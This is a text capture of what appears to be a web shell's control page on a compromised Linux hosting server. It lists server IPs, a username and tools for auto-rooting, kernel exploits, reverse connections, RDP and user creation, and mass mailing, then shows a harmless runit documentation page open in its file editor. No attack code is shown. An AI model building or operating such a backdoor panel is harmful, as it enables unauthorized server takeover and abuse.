Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
runit /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
benefits.html
7.97
KB
-rw-r--r--
dependencies.html
1.35
KB
-rw-r--r--
faq.html
12.29
KB
-rw-r--r--
index.html
11
KB
-rw-r--r--
install.html
1.6
KB
-rw-r--r--
replaceinit.html
9.14
KB
-rw-r--r--
runlevels.html
3.75
KB
-rw-r--r--
runscripts.html
25.31
KB
-rw-r--r--
upgrade.html
5.03
KB
-rw-r--r--
usedietlibc.html
917
B
-rw-r--r--
useinit.html
3.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usedietlibc.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <html> <head> <title>runit - use dietlibc</title> </head> <body> <a href="http://smarden.org/pape/">G. Pape</a><br> <a href="index.html">runit</a><br> <hr> <h1>runit - use dietlibc</h1> <hr> To recompile the <i>runit</i> programs with the <a href="http://www.fefe.de/dietlibc/">diet libc</a>, check that you have the recent version of <a href="http://www.fefe.de/dietlibc/">dietlibc</a> installed. <p> Change to the package directory of <i>runit</i> <pre> # cd /package/admin/runit/ </pre> Change the <tt>conf-cc</tt> and <tt>conf-ld</tt> to use <tt>diet</tt> <pre> # echo 'diet -Os gcc -O2 -Wall' >src/conf-cc # echo 'diet -Os gcc -s -Os -pipe' >src/conf-ld </pre> Rebuild and install the <i>runit</i> programs <pre> # package/install </pre> <hr> <address><a href="mailto:pape@smarden.org"> Gerrit Pape <pape@smarden.org> </a></address> </body> </html>
Close